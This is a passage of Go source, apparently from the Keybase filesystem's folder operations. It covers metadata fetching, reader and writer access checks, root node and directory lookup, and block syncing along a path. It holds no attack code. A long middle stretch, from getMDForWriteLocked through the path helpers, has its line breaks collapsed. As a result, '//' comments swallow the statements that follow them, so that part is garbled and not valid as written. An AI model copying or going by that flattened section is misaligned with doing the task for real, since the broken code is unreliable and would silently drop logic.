		if err != nil || rtype == mdReadNoIdentify || rtype == mdRekey {
			return
		}
		err = fbo.identifyOnce(ctx, md.ReadOnly())
	}()

	md = fbo.getHead(lState)
	if md != (ImmutableRootMetadata{}) {
		return md, nil
	}

	// Unless we're in mdWrite or mdRekey mode, we can't safely fetch
	// the new MD without causing races, so bail.
	if rtype != mdWrite && rtype != mdRekey {
		return ImmutableRootMetadata{}, MDWriteNeededInRequest{}
	}

	// We go down this code path either due to a rekey
	// notification for an unseen TLF, or in some tests.
	//
	// TODO: Make tests not take this code path, and keep track of
	// the fact that MDs coming from rekey notifications are
	// untrusted.
	fbo.mdWriterLock.AssertLocked(lState)

	// Not in cache, fetch from server and add to cache.  First, see
	// if this device has any unmerged commits -- take the latest one.
	mdops := fbo.config.MDOps()

	// get the head of the unmerged branch for this device (if any)
	md, err = mdops.GetUnmergedForTLF(ctx, fbo.id(), NullBranchID)
	if err != nil {
		return ImmutableRootMetadata{}, err
	}

	mergedMD, err := mdops.GetForTLF(ctx, fbo.id())
	if err != nil {
		return ImmutableRootMetadata{}, err
	}

	if mergedMD == (ImmutableRootMetadata{}) {
		return ImmutableRootMetadata{},
			fmt.Errorf("Got nil RMD for %s", fbo.id())
	}

	if md == (ImmutableRootMetadata{}) {
		// There are no unmerged MDs for this device, so just use the current head.
		md = mergedMD
	} else {
		func() {
			fbo.headLock.Lock(lState)
			defer fbo.headLock.Unlock(lState)
			// We don't need to do this for merged head
			// because the setHeadLocked() already does
			// that anyway.
			fbo.setLatestMergedRevisionLocked(ctx, lState, mergedMD.Revision(), false)
		}()
	}

	if md.data.Dir.Type != Dir && (!md.IsInitialized() || md.IsReadable()) {
		return ImmutableRootMetadata{}, fmt.Errorf("Got undecryptable RMD for %s: initialized=%t, readable=%t", fbo.id(), md.IsInitialized(), md.IsReadable())
	}

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	err = fbo.setInitialHeadUntrustedLocked(ctx, lState, md)
	if err != nil {
		return ImmutableRootMetadata{}, err
	}

	return md, nil
}

// getMDForReadHelper fetches the head MD and, for private folders,
// verifies the current user has read access; it returns a
// ReadAccessError otherwise.
func (fbo *folderBranchOps) getMDForReadHelper(
	ctx context.Context, lState *lockState, rtype mdReqType) (ImmutableRootMetadata, error) {
	md, err := fbo.getMDLocked(ctx, lState, rtype)
	if err != nil {
		return ImmutableRootMetadata{}, err
	}

	if !md.TlfID().IsPublic() {
		username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx)
		if err != nil {
			return ImmutableRootMetadata{}, err
		}
		if !md.GetTlfHandle().IsReader(uid) {
			return ImmutableRootMetadata{}, NewReadAccessError(md.GetTlfHandle(), username)
		}
	}
	return md, nil
}

// getMostRecentFullyMergedMD is a helper method that returns the most
// recent merged MD that has been flushed to the server.  This could
// be different from the current local head if journaling is on.  If
// the journal is on a branch, it returns an error.
func (fbo *folderBranchOps) getMostRecentFullyMergedMD(ctx context.Context) (
	ImmutableRootMetadata, error) {
	lState := makeFBOLockState()

	jServer, err := GetJournalServer(fbo.config)
	if err != nil {
		// Journaling is disabled entirely, so use the local head.
		return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify)
	}

	jStatus, err := jServer.JournalStatus(fbo.id())
	if err != nil {
		// Journaling is disabled for this TLF, so use the local head.
		// TODO: JournalStatus could return other errors (likely
		// file/disk corruption) that indicate a real problem, so it
		// might be nice to type those errors so we can distinguish
		// them.
		return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify)
	}

	if jStatus.BranchID != NullBranchID.String() {
		return ImmutableRootMetadata{},
			errors.New("Cannot find most recent merged revision while staged")
	}

	if jStatus.RevisionStart == MetadataRevisionUninitialized {
		// The journal is empty, so the local head must be the most recent.
		return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify)
	} else if jStatus.RevisionStart == MetadataRevisionInitial {
		// Nothing has been flushed to the servers yet, so don't
		// return anything.
		return ImmutableRootMetadata{}, errors.New("No flushed MDs yet")
	}

	// Otherwise, use the revision from before the start of the journal.
	mergedRev := jStatus.RevisionStart - 1
	rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID,
		mergedRev, Merged)
	if err != nil {
		return ImmutableRootMetadata{}, err
	}

	fbo.log.CDebugf(ctx, "Most recent fully merged revision is %d", mergedRev)
	return rmd, nil
}

// getMDForReadNoIdentify reads the head MD without triggering an
// identify of the folder's participants.
func (fbo *folderBranchOps) getMDForReadNoIdentify(
	ctx context.Context, lState *lockState) (ImmutableRootMetadata, error) {
	return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify)
}

// getMDForReadNeedIdentify reads the head MD and ensures the folder's
// participants have been identified at least once.
func (fbo *folderBranchOps) getMDForReadNeedIdentify(
	ctx context.Context, lState *lockState) (ImmutableRootMetadata, error) {
	return fbo.getMDForReadHelper(ctx, lState, mdReadNeedIdentify)
}

// getMDForWriteLocked returns a new RootMetadata object with an
// incremented version number for modification. If the returned object
// is put to the MDServer (via MDOps), mdWriterLock must be held until
// then. (See comments for mdWriterLock above.)
func (fbo *folderBranchOps) getMDForWriteLocked( ctx context.Context, lState *lockState) (*RootMetadata, error) { return fbo.getMDForWriteLockedForFilename(ctx, lState, "") } func (fbo *folderBranchOps) getMDForWriteLockedForFilename( ctx context.Context, lState *lockState, filename string) (*RootMetadata, error) { fbo.mdWriterLock.AssertLocked(lState) md, err := fbo.getMDLocked(ctx, lState, mdWrite) if err != nil { return nil, err } username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return nil, err } if !md.GetTlfHandle().IsWriter(uid) { return nil, NewWriteAccessError(md.GetTlfHandle(), username, filename) } // Make a new successor of the current MD to hold the coming // writes. The caller must pass this into // syncBlockAndCheckEmbedLocked or the changes will be lost. newMd, err := md.MakeSuccessor(fbo.config, md.mdID, true) if err != nil { return nil, err } return newMd, nil } func (fbo *folderBranchOps) getMDForRekeyWriteLocked( ctx context.Context, lState *lockState) (rmd *RootMetadata, wasRekeySet bool, err error) { fbo.mdWriterLock.AssertLocked(lState) md, err := fbo.getMDLocked(ctx, lState, mdRekey) if err != nil { return nil, false, err } username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return nil, false, err } handle := md.GetTlfHandle() // must be a reader or writer (it checks both.) 
if !handle.IsReader(uid) { return nil, false, NewRekeyPermissionError(md.GetTlfHandle(), username) } newMd, err := md.MakeSuccessor(fbo.config, md.mdID, handle.IsWriter(uid)) if err != nil { return nil, false, err } // readers shouldn't modify writer metadata if !handle.IsWriter(uid) && !newMd.IsWriterMetadataCopiedSet() { return nil, false, NewRekeyPermissionError(handle, username) } return newMd, md.IsRekeySet(), nil } func (fbo *folderBranchOps) nowUnixNano() int64 { return fbo.config.Clock().Now().UnixNano() } func (fbo *folderBranchOps) maybeUnembedAndPutOneBlock(ctx context.Context, md *RootMetadata) error { if fbo.config.BlockSplitter().ShouldEmbedBlockChanges(&md.data.Changes) { return nil } _, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return err } bps := newBlockPutState(1) err = fbo.unembedBlockChanges(ctx, bps, md, &md.data.Changes, uid) if err != nil { return err } defer func() { if err != nil { fbo.fbm.cleanUpBlockState(md.ReadOnly(), bps, blockDeleteOnMDFail) } }() ptrsToDelete, err := doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *bps) if err != nil { return err } if len(ptrsToDelete) > 0 { return fmt.Errorf("Unexpected pointers to delete after "+ "unembedding block changes in gc op: %v", ptrsToDelete) } return nil } func (fbo *folderBranchOps) initMDLocked( ctx context.Context, lState *lockState, md *RootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) // create a dblock since one doesn't exist yet username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return err } handle := md.GetTlfHandle() // make sure we're a writer before rekeying or putting any blocks. 
if !handle.IsWriter(uid) { return NewWriteAccessError(handle, username, handle.GetCanonicalPath()) } newDblock := &DirBlock{ Children: make(map[string]DirEntry), } var expectedKeyGen KeyGen var tlfCryptKey *TLFCryptKey if md.TlfID().IsPublic() { expectedKeyGen = PublicKeyGen } else { var rekeyDone bool // create a new set of keys for this metadata rekeyDone, tlfCryptKey, err = fbo.config.KeyManager().Rekey(ctx, md, false) if err != nil { return err } if !rekeyDone { return fmt.Errorf("Initial rekey unexpectedly not done for private TLF %v", md.TlfID()) } expectedKeyGen = FirstValidKeyGen } keyGen := md.LatestKeyGeneration() if keyGen != expectedKeyGen { return InvalidKeyGenerationError{md.TlfID(), keyGen} } info, plainSize, readyBlockData, err := fbo.blocks.ReadyBlock(ctx, md.ReadOnly(), newDblock, uid) if err != nil { return err } now := fbo.nowUnixNano() md.data.Dir = DirEntry{ BlockInfo: info, EntryInfo: EntryInfo{ Type: Dir, Size: uint64(plainSize), Mtime: now, Ctime: now, }, } co := newCreateOpForRootDir() md.AddOp(co) md.AddRefBlock(md.data.Dir.BlockInfo) md.SetUnrefBytes(0) if err = putBlockCheckQuota(ctx, fbo.config.BlockServer(), fbo.config.Reporter(), md.TlfID(), info.BlockPointer, readyBlockData, md.GetTlfHandle().GetCanonicalName()); err != nil { return err } if err = fbo.config.BlockCache().Put( info.BlockPointer, fbo.id(), newDblock, TransientEntry); err != nil { return err } if err := fbo.maybeUnembedAndPutOneBlock(ctx, md); err != nil { return err } // finally, write out the new metadata mdID, err := fbo.config.MDOps().Put(ctx, md) if err != nil { return err } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) if fbo.head != (ImmutableRootMetadata{}) { return fmt.Errorf( "%v: Unexpected MD ID during new MD initialization: %v", md.TlfID(), fbo.head.mdID) } fbo.setNewInitialHeadLocked(ctx, lState, MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now())) if err != nil { return err } // cache any new TLF crypt key if tlfCryptKey != nil { 
err = fbo.config.KeyCache().PutTLFCryptKey(md.TlfID(), keyGen, *tlfCryptKey) if err != nil { return err } } return nil } func (fbo *folderBranchOps) GetTLFCryptKeys(ctx context.Context, h *TlfHandle) (keys []TLFCryptKey, id TlfID, err error) { return nil, TlfID{}, errors.New("GetTLFCryptKeys is not supported by folderBranchOps") } func (fbo *folderBranchOps) GetOrCreateRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) { return nil, EntryInfo{}, errors.New("GetOrCreateRootNode is not supported by folderBranchOps") } func (fbo *folderBranchOps) GetRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) { return nil, EntryInfo{}, errors.New("GetRootNode is not supported by folderBranchOps") } func (fbo *folderBranchOps) checkNode(node Node) error { fb := node.GetFolderBranch() if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } return nil } // SetInitialHeadFromServer sets the head to the given // ImmutableRootMetadata, which must be retrieved from the MD server. func (fbo *folderBranchOps) SetInitialHeadFromServer( ctx context.Context, md ImmutableRootMetadata) (err error) { fbo.log.CDebugf(ctx, "SetInitialHeadFromServer, revision=%d (%s)", md.Revision(), md.MergedStatus()) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if md.data.Dir.Type != Dir { // Not initialized. return fmt.Errorf("MD with revision=%d not initialized", md.Revision()) } return runUnlessCanceled(ctx, func() error { fb := FolderBranch{md.TlfID(), MasterBranch} if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } // Always identify first when trying to initialize the folder, // even if we turn out not to be a writer. (We can't rely on // the identifyOnce call in getMDLocked, because that isn't // called from the initialization code path when the local // user is not a valid writer.) 
Also, we want to make sure we // fail before we set the head, otherwise future calls will // succeed incorrectly. err = fbo.identifyOnce(ctx, md.ReadOnly()) if err != nil { return err } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) if md.MergedStatus() == Unmerged { mdops := fbo.config.MDOps() mergedMD, err := mdops.GetForTLF(ctx, fbo.id()) if err != nil { return err } func() { fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) fbo.setLatestMergedRevisionLocked(ctx, lState, mergedMD.Revision(), false) }() } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // Only update the head the first time; later it will be // updated either directly via writes or through the // background update processor. if fbo.head == (ImmutableRootMetadata{}) { err = fbo.setInitialHeadTrustedLocked(ctx, lState, md) if err != nil { return err } } return nil }) } // SetInitialHeadToNew creates a brand-new ImmutableRootMetadata // object and sets the head to that. func (fbo *folderBranchOps) SetInitialHeadToNew( ctx context.Context, id TlfID, handle *TlfHandle) (err error) { fbo.log.CDebugf(ctx, "SetInitialHeadToNew") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() bh, err := handle.ToBareHandle() if err != nil { return err } rmd := NewRootMetadata() rmd.Update(id, bh) if err != nil { return err } // Need to keep the TLF handle around long enough to // rekey the metadata for the first time. rmd.tlfHandle = handle return runUnlessCanceled(ctx, func() error { fb := FolderBranch{rmd.TlfID(), MasterBranch} if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } // Always identify first when trying to initialize the folder, // even if we turn out not to be a writer. (We can't rely on // the identifyOnce call in getMDLocked, because that isn't // called from the initialization code path when the local // user is not a valid writer.) 
Also, we want to make sure we // fail before we set the head, otherwise future calls will // succeed incorrectly. err = fbo.identifyOnce(ctx, rmd.ReadOnly()) if err != nil { return err } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.initMDLocked(ctx, lState, rmd) }) } // execMDReadNoIdentifyThenMDWrite first tries to execute the // passed-in method in mdReadNoIdentify mode. If it fails with an // MDWriteNeededInRequest error, it re-executes the method as in // mdWrite mode. The passed-in method must note whether or not this // is an mdWrite call. // // This must only be used by getRootNode(). func (fbo *folderBranchOps) execMDReadNoIdentifyThenMDWrite( lState *lockState, f func(*lockState, mdReqType) error) error { err := f(lState, mdReadNoIdentify) // Redo as an MD write request if needed if _, ok := err.(MDWriteNeededInRequest); ok { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) err = f(lState, mdWrite) } return err } func (fbo *folderBranchOps) getRootNode(ctx context.Context) ( node Node, ei EntryInfo, handle *TlfHandle, err error) { fbo.log.CDebugf(ctx, "getRootNode") defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { // node may still be nil if we're unwinding // from a panic. 
fbo.deferLog.CDebugf(ctx, "Done: %v", node) } }() lState := makeFBOLockState() var md ImmutableRootMetadata err = fbo.execMDReadNoIdentifyThenMDWrite(lState, func(lState *lockState, rtype mdReqType) error { md, err = fbo.getMDLocked(ctx, lState, rtype) return err }) if err != nil { return nil, EntryInfo{}, nil, err } // we may be an unkeyed client if err := isReadableOrError(ctx, fbo.config, md.ReadOnly()); err != nil { return nil, EntryInfo{}, nil, err } handle = md.GetTlfHandle() node, err = fbo.nodeCache.GetOrCreate(md.data.Dir.BlockPointer, string(handle.GetCanonicalName()), nil) if err != nil { return nil, EntryInfo{}, nil, err } return node, md.Data().Dir.EntryInfo, handle, nil } type makeNewBlock func() Block // pathFromNodeHelper() shouldn't be called except by the helper // functions below. func (fbo *folderBranchOps) pathFromNodeHelper(n Node) (path, error) { p := fbo.nodeCache.PathFromNode(n) if !p.isValid() { return path{}, InvalidPathError{p} } return p, nil } // Helper functions to clarify uses of pathFromNodeHelper() (see // nodeCache comments). 
// pathFromNodeForRead returns the path for a node being used in a
// read-only operation.
func (fbo *folderBranchOps) pathFromNodeForRead(n Node) (path, error) {
	return fbo.pathFromNodeHelper(n)
}

// pathFromNodeForMDWriteLocked returns the path for a node being used
// in an MD-write operation; mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) pathFromNodeForMDWriteLocked(
	lState *lockState, n Node) (path, error) {
	fbo.mdWriterLock.AssertLocked(lState)
	return fbo.pathFromNodeHelper(n)
}

// GetDirChildren returns the (possibly dirty) entries of the given
// directory node.
func (fbo *folderBranchOps) GetDirChildren(ctx context.Context, dir Node) (
	children map[string]EntryInfo, err error) {
	fbo.log.CDebugf(ctx, "GetDirChildren %p", dir.GetID())
	defer func() { fbo.deferLog.CDebugf(ctx, "Done GetDirChildren: %v", err) }()

	err = fbo.checkNode(dir)
	if err != nil {
		return nil, err
	}

	err = runUnlessCanceled(ctx, func() error {
		var err error
		lState := makeFBOLockState()

		md, err := fbo.getMDForReadNeedIdentify(ctx, lState)
		if err != nil {
			return err
		}

		dirPath, err := fbo.pathFromNodeForRead(dir)
		if err != nil {
			return err
		}

		children, err = fbo.blocks.GetDirtyDirChildren(
			ctx, lState, md.ReadOnly(), dirPath)
		if err != nil {
			return err
		}
		return nil
	})
	if err != nil {
		return nil, err
	}
	return children, nil
}

// Lookup resolves name within the given directory node, returning the
// child node (nil for symlinks) and its entry info.
func (fbo *folderBranchOps) Lookup(ctx context.Context, dir Node, name string) (
	node Node, ei EntryInfo, err error) {
	fbo.log.CDebugf(ctx, "Lookup %p %s", dir.GetID(), name)
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	err = fbo.checkNode(dir)
	if err != nil {
		return nil, EntryInfo{}, err
	}

	var de DirEntry
	err = runUnlessCanceled(ctx, func() error {
		lState := makeFBOLockState()
		md, err := fbo.getMDForReadNeedIdentify(ctx, lState)
		if err != nil {
			return err
		}

		dirPath, err := fbo.pathFromNodeForRead(dir)
		if err != nil {
			return err
		}

		childPath := dirPath.ChildPathNoPtr(name)

		de, err = fbo.blocks.GetDirtyEntry(
			ctx, lState, md.ReadOnly(), childPath)
		if err != nil {
			return err
		}

		if de.Type == Sym {
			// Symlinks have no node; the caller uses the entry
			// info's SymPath instead.
			node = nil
		} else {
			err = fbo.checkDataVersion(childPath, de.BlockPointer)
			if err != nil {
				return err
			}

			node, err = fbo.nodeCache.GetOrCreate(de.BlockPointer, name, dir)
			if err != nil {
				return err
			}
		}

		return nil
	})
	if err != nil {
		return nil, EntryInfo{}, err
	}
	return node, de.EntryInfo, nil
}

// statEntry is like Stat, but it returns a DirEntry. This is used by
// tests.
func (fbo *folderBranchOps) statEntry(ctx context.Context, node Node) (
	de DirEntry, err error) {
	err = fbo.checkNode(node)
	if err != nil {
		return DirEntry{}, err
	}

	lState := makeFBOLockState()

	nodePath, err := fbo.pathFromNodeForRead(node)
	if err != nil {
		return DirEntry{}, err
	}

	var md ImmutableRootMetadata
	if nodePath.hasValidParent() {
		md, err = fbo.getMDForReadNeedIdentify(ctx, lState)
	} else {
		// If nodePath has no valid parent, it's just the TLF
		// root, so we don't need an identify in this case.
		md, err = fbo.getMDForReadNoIdentify(ctx, lState)
	}
	if err != nil {
		return DirEntry{}, err
	}

	if nodePath.hasValidParent() {
		de, err = fbo.blocks.GetDirtyEntry(
			ctx, lState, md.ReadOnly(), nodePath)
		if err != nil {
			return DirEntry{}, err
		}

	} else {
		// nodePath is just the root.
		de = md.data.Dir
	}

	return de, nil
}

// zeroPtr is the zero-value BlockPointer, used as a sentinel.
var zeroPtr BlockPointer

// blockState pairs a block with its pointer, its serialized/ready
// data, and an optional per-block completion callback.
type blockState struct {
	blockPtr       BlockPointer
	block          Block
	readyBlockData ReadyBlockData
	syncedCb       func() error
}

// Stat returns the entry info for the given node.
func (fbo *folderBranchOps) Stat(ctx context.Context, node Node) (
	ei EntryInfo, err error) {
	fbo.log.CDebugf(ctx, "Stat %p", node.GetID())
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	var de DirEntry
	err = runUnlessCanceled(ctx, func() error {
		de, err = fbo.statEntry(ctx, node)
		return err
	})
	if err != nil {
		return EntryInfo{}, err
	}
	return de.EntryInfo, nil
}

// GetNodeMetadata returns block info plus the last writer's username
// for the given node (falling back to the creator when no writer is
// recorded).
func (fbo *folderBranchOps) GetNodeMetadata(ctx context.Context, node Node) (
	ei NodeMetadata, err error) {
	fbo.log.CDebugf(ctx, "GetNodeMetadata %p", node.GetID())
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	var de DirEntry
	err = runUnlessCanceled(ctx, func() error {
		de, err = fbo.statEntry(ctx, node)
		return err
	})
	var res NodeMetadata
	if err != nil {
		return res, err
	}
	res.BlockInfo = de.BlockInfo
	uid := de.Writer
	if uid == keybase1.UID("") {
		uid = de.Creator
	}
	res.LastWriterUnverified, err =
		fbo.config.KBPKI().GetNormalizedUsername(ctx, uid)
	if err != nil {
		return res, err
	}
	return res, nil
}

// blockPutState is an internal structure to track data when putting blocks
type blockPutState struct {
	blockStates []blockState
}

// newBlockPutState returns a blockPutState with capacity reserved for
// length blocks.
func newBlockPutState(length int) *blockPutState {
	bps := &blockPutState{}
	bps.blockStates = make([]blockState, 0, length)
	return bps
}

// addNewBlock tracks a new block that will be put.  If syncedCb is
// non-nil, it will be called whenever the put for that block is
// complete (whether or not the put resulted in an error).  Currently
// it will not be called if the block is never put (due to an earlier
// error).
func (bps *blockPutState) addNewBlock(blockPtr BlockPointer, block Block,
	readyBlockData ReadyBlockData, syncedCb func() error) {
	bps.blockStates = append(bps.blockStates,
		blockState{blockPtr, block, readyBlockData, syncedCb})
}

// mergeOtherBps appends all of other's tracked blocks to bps.
func (bps *blockPutState) mergeOtherBps(other *blockPutState) {
	bps.blockStates = append(bps.blockStates, other.blockStates...)
}

// DeepCopy copies the blockStates slice into a new blockPutState.
// NOTE(review): this copies only the slice; the Block and
// ReadyBlockData values inside each blockState are shared with the
// original — confirm callers don't mutate them after copying.
func (bps *blockPutState) DeepCopy() *blockPutState {
	newBps := &blockPutState{}
	newBps.blockStates = make([]blockState, len(bps.blockStates))
	copy(newBps.blockStates, bps.blockStates)
	return newBps
}

// readyBlockMultiple readies currBlock for the server and records it
// in bps for a later batched put, returning its new block info and
// plaintext size.
func (fbo *folderBranchOps) readyBlockMultiple(ctx context.Context,
	kmd KeyMetadata, currBlock Block, uid keybase1.UID,
	bps *blockPutState) (info BlockInfo, plainSize int, err error) {
	info, plainSize, readyBlockData, err :=
		fbo.blocks.ReadyBlock(ctx, kmd, currBlock, uid)
	if err != nil {
		return
	}

	bps.addNewBlock(info.BlockPointer, currBlock, readyBlockData, nil)
	return
}

// unembedBlockChanges encodes the given block changes into their own
// file block, records that block in bps, and rewrites changes to
// point at the new block (keeping a cached copy of the original ops
// in md.data.cachedChanges).
func (fbo *folderBranchOps) unembedBlockChanges(
	ctx context.Context, bps *blockPutState, md *RootMetadata,
	changes *BlockChanges, uid keybase1.UID) (err error) {
	buf, err := fbo.config.Codec().Encode(changes)
	if err != nil {
		return
	}
	block := NewFileBlock().(*FileBlock)
	block.Contents = buf
	info, _, err := fbo.readyBlockMultiple(
		ctx, md.ReadOnly(), block, uid, bps)
	if err != nil {
		return
	}
	md.data.cachedChanges = *changes
	changes.Info = info
	changes.Ops = nil
	md.AddRefBytes(uint64(info.EncodedSize))
	md.AddDiskUsage(uint64(info.EncodedSize))
	return
}

// localBcache maps a block pointer to a dirty directory block that
// has not yet been readied, shared across successive syncBlock calls.
type localBcache map[BlockPointer]*DirBlock

// syncBlock updates, and readies, the blocks along the path for the
// given write, up to the root of the tree or stopAt (if specified).
// When it updates the root of the tree, it also modifies the given
// head object with a new revision number and root block ID.  It first
// checks the provided lbc for blocks that may have been modified by
// previous syncBlock calls or the FS calls themselves.  It returns
// the updated path to the changed directory, the new or updated
// directory entry created as part of the call, and a summary of all
// the blocks that now must be put to the block server.
//
// This function is safe to use unlocked, but may modify MD to have
// the same revision number as another one. All functions in this file
// must call syncBlockLocked instead, which holds mdWriterLock and
// thus serializes the revision numbers. Conflict resolution may call
// syncBlockForConflictResolution, which doesn't hold the lock, since
// it already handles conflicts correctly.
//
// entryType must not be Sym.
//
// TODO: deal with multiple nodes for indirect blocks
func (fbo *folderBranchOps) syncBlock(
	ctx context.Context, lState *lockState, uid keybase1.UID,
	md *RootMetadata, newBlock Block, dir path, name string,
	entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer,
	lbc localBcache) (path, DirEntry, *blockPutState, error) {
	// now ready each dblock and write the DirEntry for the next one
	// in the path
	currBlock := newBlock
	currName := name
	newPath := path{
		FolderBranch: dir.FolderBranch,
		path:         make([]pathNode, 0, len(dir.path)),
	}
	bps := newBlockPutState(len(dir.path))
	refPath := dir.ChildPathNoPtr(name)
	var newDe DirEntry
	doSetTime := true
	now := fbo.nowUnixNano()
	// Walk from the modified block up toward the root (or stopAt),
	// readying each block and updating its parent's entry.
	for len(newPath.path) < len(dir.path)+1 {
		info, plainSize, err := fbo.readyBlockMultiple(
			ctx, md.ReadOnly(), currBlock, uid, bps)
		if err != nil {
			return path{}, DirEntry{}, nil, err
		}

		// prepend to path and setup next one
		newPath.path = append([]pathNode{{info.BlockPointer, currName}},
			newPath.path...)

		// get the parent block
		prevIdx := len(dir.path) - len(newPath.path)
		var prevDblock *DirBlock
		var de DirEntry
		var nextName string
		nextDoSetTime := false
		if prevIdx < 0 {
			// root dir, update the MD instead
			de = md.data.Dir
		} else {
			prevDir := path{
				FolderBranch: dir.FolderBranch,
				path:         dir.path[:prevIdx+1],
			}

			// First, check the localBcache, which could contain
			// blocks that were modified across multiple calls to
			// syncBlock.
			var ok bool
			prevDblock, ok = lbc[prevDir.tailPointer()]
			if !ok {
				// If the block isn't in the local bcache, we
				// have to fetch it, possibly from the
				// network. Directory blocks are only ever
				// modified while holding mdWriterLock, so it's
				// safe to fetch them one at a time.
				prevDblock, err = fbo.blocks.GetDir(
					ctx, lState, md.ReadOnly(),
					prevDir, blockWrite)
				if err != nil {
					return path{}, DirEntry{}, nil, err
				}
			}

			// modify the direntry for currName; make one
			// if it doesn't exist (which should only
			// happen the first time around).
			//
			// TODO: Pull the creation out of here and
			// into createEntryLocked().
			if de, ok = prevDblock.Children[currName]; !ok {
				// If this isn't the first time
				// around, we have an error.
				if len(newPath.path) > 1 {
					return path{}, DirEntry{}, nil, NoSuchNameError{currName}
				}

				// If this is a file, the size should be 0. (TODO:
				// Ensure this.)  If this is a directory, the size will
				// be filled in below.  The times will be filled in
				// below as well, since we should only be creating a
				// new directory entry when doSetTime is true.
				de = DirEntry{
					EntryInfo: EntryInfo{
						Type: entryType,
						Size: 0,
					},
				}
				// If we're creating a new directory entry, the
				// parent's times must be set as well.
				nextDoSetTime = true
			}

			currBlock = prevDblock
			nextName = prevDir.tailName()
		}

		if de.Type == Dir {
			// TODO: When we use indirect dir blocks,
			// we'll have to calculate the size some other
			// way.
			de.Size = uint64(plainSize)
		}

		if prevIdx < 0 {
			md.AddUpdate(md.data.Dir.BlockInfo, info)
		} else if prevDe, ok := prevDblock.Children[currName]; ok {
			md.AddUpdate(prevDe.BlockInfo, info)
		} else {
			// this is a new block
			md.AddRefBlock(info)
		}

		if len(refPath.path) > 1 {
			refPath = *refPath.parentPath()
		}

		de.BlockInfo = info

		if doSetTime {
			if mtime {
				de.Mtime = now
			}
			if ctime {
				de.Ctime = now
			}
		}
		if !newDe.IsInitialized() {
			newDe = de
		}

		if prevIdx < 0 {
			md.data.Dir = de
		} else {
			prevDblock.Children[currName] = de
		}
		currName = nextName

		// Stop before we get to the common ancestor; it will be taken care of
		// on the next sync call
		if prevIdx >= 0 && dir.path[prevIdx].BlockPointer == stopAt {
			// Put this back into the cache as dirty -- the next
			// syncBlock call will ready it.
			dblock, ok := currBlock.(*DirBlock)
			if !ok {
				return path{}, DirEntry{}, nil, BadDataError{stopAt.ID}
			}
			lbc[stopAt] = dblock
			break
		}
		doSetTime = nextDoSetTime
	}

	return newPath, newDe, bps, nil
}

// syncBlockLock calls syncBlock under mdWriterLock.
func (fbo *folderBranchOps) syncBlockLocked(
	ctx context.Context, lState *lockState, uid keybase1.UID,
	md *RootMetadata, newBlock Block, dir path, name string,
	entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer,
	lbc localBcache) (path, DirEntry, *blockPutState, error) {
	fbo.mdWriterLock.AssertLocked(lState)
	return fbo.syncBlock(ctx, lState, uid, md, newBlock, dir,
		name, entryType, mtime, ctime, stopAt, lbc)
}

// syncBlockForConflictResolution calls syncBlock unlocked, since
// conflict resolution can handle MD revision number conflicts
// correctly.
func (fbo *folderBranchOps) syncBlockForConflictResolution(
	ctx context.Context, lState *lockState, uid keybase1.UID,
	md *RootMetadata, newBlock Block, dir path, name string,
	entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer,
	lbc localBcache) (path, DirEntry, *blockPutState, error) {
	// Deliberately no mdWriterLock assertion here: conflict
	// resolution handles MD revision number conflicts itself, so it
	// may call syncBlock without holding the writer lock.
	return fbo.syncBlock(
		ctx, lState, uid, md, newBlock, dir,
		name, entryType, mtime, ctime, stopAt, lbc)
}

// entryType must not be Sym.
//
// syncBlockAndCheckEmbedLocked syncs newBlock (and the blocks on its
// path) up to stopAt, and, when this is the final sync for this MD
// (stopAt == zeroPtr), unembeds the MD's block changes into separate
// blocks if the block splitter says they are too large to stay
// embedded.  Must be called with mdWriterLock held.
func (fbo *folderBranchOps) syncBlockAndCheckEmbedLocked(ctx context.Context,
	lState *lockState, md *RootMetadata, newBlock Block, dir path,
	name string, entryType EntryType, mtime bool, ctime bool,
	stopAt BlockPointer, lbc localBcache) (
	path, DirEntry, *blockPutState, error) {
	fbo.mdWriterLock.AssertLocked(lState)

	// The current user's UID is needed both for the block sync and
	// for unembedding the block changes below.
	_, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx)
	if err != nil {
		return path{}, DirEntry{}, nil, err
	}

	newPath, newDe, bps, err := fbo.syncBlockLocked(
		ctx, lState, uid, md, newBlock, dir, name, entryType, mtime,
